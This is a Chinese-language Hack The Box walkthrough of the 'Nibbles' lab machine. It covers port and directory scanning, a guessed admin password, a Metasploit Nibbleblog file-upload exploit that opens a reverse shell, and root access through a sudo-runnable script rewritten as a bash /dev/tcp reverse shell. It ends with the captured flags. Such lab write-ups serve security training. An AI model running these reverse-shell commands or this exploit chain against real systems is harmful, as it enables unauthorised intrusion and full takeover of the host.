⚠️ 郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,如果您不同意请关闭该页面!任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
ℹ️ 目标信息
🔍 端口扫描
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles] └─$ sudo nmap -sS -p- --max-retries=0 10.10.10.75 -oN allports.txt -oX allports.xml Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 14:06 CST Warning: 10.10.10.75 giving up on port because retransmission cap hit (0). Nmap scan report for 10.10.10.75 (10.10.10.75) Host is up (0.28s latency). Not shown: 57242 closed tcp ports (reset), 8291 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 92.34 seconds
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles] └─$ nmap -sV -sC -p $(cat allports.txt | grep ^[0-9] | cut -d / -f1 | tr '\n' ',' | sed s/,$//) 10.10.10.75 -Pn -oN nmap.txt -oX nmap.xml Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 14:12 CST Nmap scan report for 10.10.10.75 (10.10.10.75) Host is up (0.33s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.47 seconds
🤔 情报分析
由于存在
80页面,所以首先访问web页面随后看看SSH是否有机会用到访问Web页面
继续访问 /
nibbleblog/目录
把链接都点一遍,没有什么有用信息,那么就遍历目录和文件
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles] └─$ gobuster dir -u http://10.10.10.75/nibbleblog/ -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.75/nibbleblog/ [+] Method: GET [+] Threads: 10 [+] Wordlist: ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/04/07 14:18:34 Starting gobuster in directory enumeration mode =============================================================== /content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/] Progress: 121 / 81644 (0.15%) [ERROR] 2022/04/07 14:18:46 [!] Get "http://10.10.10.75/nibbleblog/warez": context deadline exceeded (Client.Timeout exceeded while awaiting headers) /themes (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/] /admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/] /plugins (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/] /languages (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/] Progress: 2405 / 81644 (2.95%)
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles] └─$ gobuster dir -u http://10.10.10.75/nibbleblog/ -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php,html,txt,sh =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.75/nibbleblog/ [+] Method: GET [+] Threads: 10 [+] Wordlist: ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: sh,php,html,txt [+] Timeout: 10s =============================================================== 2022/04/07 14:20:29 Starting gobuster in directory enumeration mode =============================================================== /index.php (Status: 200) [Size: 2987] /sitemap.php (Status: 200) [Size: 402] /content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/] /themes (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/] /feed.php (Status: 200) [Size: 302] /admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/] /admin.php (Status: 200) [Size: 1401] Progress: 2135 / 408220 (0.52%)
发现了
admin目录和admin.php分别访问查看
这里有一个登录框,先试试万能密码,不能进入
那搜索一下这个博客框架的漏洞
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles] └─$ searchsploit nibbleblog bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8) ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results Papers: No Results
复制漏洞文件并查看漏洞内容
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles] └─$ searchsploit -m php/remote/38489.rb bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8) Exploit: Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) URL: https://www.exploit-db.com/exploits/38489 Path: /usr/share/exploitdb/exploits/php/remote/38489.rb File Type: Ruby script, ASCII text Copied to: /home/liona/Workspace/HTB/Nibbles/38489.rb
这里的第二个漏洞是可以使用msf的,我们在msf中加载,然后看看需要什么设置或者信息
msf6 exploit(multi/http/nibbleblog_file_upload) > show options Module options (exploit/multi/http/nibbleblog_file_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes The password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.75 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /nibbleblog/ yes The base path to the web application USERNAME yes The username to authenticate with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.14.26 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Nibbleblog 4.0.3
需要用户名和密码,那么在哪里去寻找这个凭据呢,这里的博客框架很可能是开源的,去GitHub看一下
可以看到存在一个
install.php文件,那么就访问一下
点击
update?那就试一下
<config> <name type="string">Nibbles</name> <slogan type="string">Yum yum</slogan> <footer type="string">Powered by Nibbleblog</footer> <advanced_post_options type="integer">0</advanced_post_options> <url type="string">http://10.10.10.75/nibbleblog/</url> <path type="string">/nibbleblog/</path> <items_rss type="integer">4</items_rss> <items_page type="integer">6</items_page> <language type="string">en_US</language> <timezone type="string">UTC</timezone> <timestamp_format type="string">%d %B, %Y</timestamp_format> <locale type="string">en_US</locale> <img_resize type="integer">1</img_resize> <img_resize_width type="integer">1000</img_resize_width> <img_resize_height type="integer">600</img_resize_height> <img_resize_quality type="integer">100</img_resize_quality> <img_resize_option type="string">auto</img_resize_option> <img_thumbnail type="integer">1</img_thumbnail> <img_thumbnail_width type="integer">190</img_thumbnail_width> <img_thumbnail_height type="integer">190</img_thumbnail_height> <img_thumbnail_quality type="integer">100</img_thumbnail_quality> <img_thumbnail_option type="string">landscape</img_thumbnail_option> <theme type="string">simpler</theme> <notification_comments type="integer">1</notification_comments> <notification_session_fail type="integer">0</notification_session_fail> <notification_session_start type="integer">0</notification_session_start> <notification_email_to type="string">admin@nibbles.com</notification_email_to> <notification_email_from type="string">noreply@10.10.10.134</notification_email_from> <seo_site_title type="string">Nibbles - Yum yum</seo_site_title> <seo_site_description type="string"/> <seo_keywords type="string"/> <seo_robots type="string"/> <seo_google_code type="string"/> <seo_bing_code type="string"/> <seo_author type="string"/> <friendly_urls type="integer">0</friendly_urls> <default_homepage type="integer">0</default_homepage> </config>
并没有账号密码,当前路径为/nibbleblog/content/private/config.xml 这个路应该会存在敏感文件,直接访问目录试试 http://10.10.10.75/nibbleblog/content/private/
这个应该有点东西,打开看看,emm并没有相关信息
这里有一个黑名单,这里存在这封禁IP的策略,经过之后的爆破,这里是一个密码错误尝试的黑名单
这里进过验证只能采用爆破,或者猜测的方式进行登陆 密码为
nibbles通过
admin:nibbles 登陆admin.php
登陆成功,使用msf填写登陆信息,进行攻击
msf6 exploit(multi/http/nibbleblog_file_upload) > show options Module options (exploit/multi/http/nibbleblog_file_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD nibbles yes The password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.75 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /nibbleblog/ yes The base path to the web application USERNAME admin yes The username to authenticate with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.14.26 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Nibbleblog 4.0.3
msf6 exploit(multi/http/nibbleblog_file_upload) > run [*] Started reverse TCP handler on 10.10.14.26:4444 [*] Sending stage (39282 bytes) to 10.10.10.75 [+] Deleted image.php [*] Meterpreter session 1 opened (10.10.14.26:4444 -> 10.10.10.75:54648 ) at 2022-04-07 15:35:35 +0800 meterpreter > meterpreter >
msf6 exploit(multi/http/nibbleblog_file_upload) > run [*] Started reverse TCP handler on 10.10.14.26:4444 [*] Sending stage (39282 bytes) to 10.10.10.75 [+] Deleted image.php [*] Meterpreter session 1 opened (10.10.14.26:4444 -> 10.10.10.75:54648 ) at 2022-04-07 15:35:35 +0800 meterpreter > meterpreter > meterpreter > shell Process 1662 created. Channel 0 created. ls db.xml python3 -c "import pty;pty.spawn('/bin/bash')" nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd cd bash: cd: HOME not set nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home <ml/nibbleblog/content/private/plugins/my_image$ cd /home nibbler@Nibbles:/home$ ls ls nibbler nibbler@Nibbles:/home$
💥 实施攻击
获取 USER.TXT
nibbler@Nibbles:/home$ cat nibbler/user.txt cat nibbler/user.txt 1b6b5c5ccce562645c87ce3738adb27c nibbler@Nibbles:/home$
获取 ROOT.TXT
验证
sudo命令nibbler@Nibbles:/home$ sudo sudo usage: sudo -h | -K | -k | -V usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user] usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command] usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] [VAR=value] [-i|-s] [<command>] usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ... nibbler@Nibbles:/home$ sudo -l sudo -l Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh nibbler@Nibbles:/home$
发现可以使用
sudo命令,并可以无密码以root身份运行/home/nibbler/personal/stuff/monitor.sh查看
/home/nibbler/personal/stuff/monitor.sh内容nibbler@Nibbles:/home$ cat /home/nibbler/personal/stuff/monitor.sh cat /home/nibbler/personal/stuff/monitor.sh cat: /home/nibbler/personal/stuff/monitor.sh: No such file or directory
这就意味着我们可以自己创建这个文件并运行,那就开始吧
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles] └─$ cat monitor.sh #!/bin/bash bash -i >& /dev/tcp/10.10.14.26/1234 0>&1 ┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles] └─$ python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles] └─$ nc -nvlp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234
nibbler@Nibbles:/home/nibbler/personal/stuff$ wget wget wget: missing URL Usage: wget [OPTION]... [URL]... Try `wget --help' for more options. nibbler@Nibbles:/home/nibbler/personal/stuff$ wget http://10.10.14.26/monitor.sh <er/personal/stuff$ wget http://10.10.14.26/monitor.sh --2022-04-07 03:44:02-- http://10.10.14.26/monitor.sh Connecting to 10.10.14.26:80... connected. HTTP request sent, awaiting response... 200 OK Length: 54 [text/x-sh] Saving to: 'monitor.sh' monitor.sh 100%[===================>] 54 --.-KB/s in 0s 2022-04-07 03:44:03 (10.5 MB/s) - 'monitor.sh' saved [54/54] nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh chmod +x monitor.sh nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh sudo ./monitor.sh
┌──(liona㉿kali)-[~/Workspace/HTB/Nibbles] └─$ nc -nvlp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.10.10.75. Ncat: Connection from 10.10.10.75:49884. root@Nibbles:/home/nibbler/personal/stuff# cat /root/root.txt cat /root/root.txt e76c7db9651f7bd5505025ad296d2a35 root@Nibbles:/home/nibbler/personal/stuff#
📝 总结
这个题目最大的难点在于账号密码的破解,这个目前无解,要么猜,要么爆破 😔
知识点
- gobuster 爆破目录
技巧
- 通过Python完整PTY 获取:
python3 -c "import pty;pty.spawn('/bin/bash')"
- Bash 反弹 shell:
bash -i >& /dev/tcp/10.10.14.26/1234 0>&1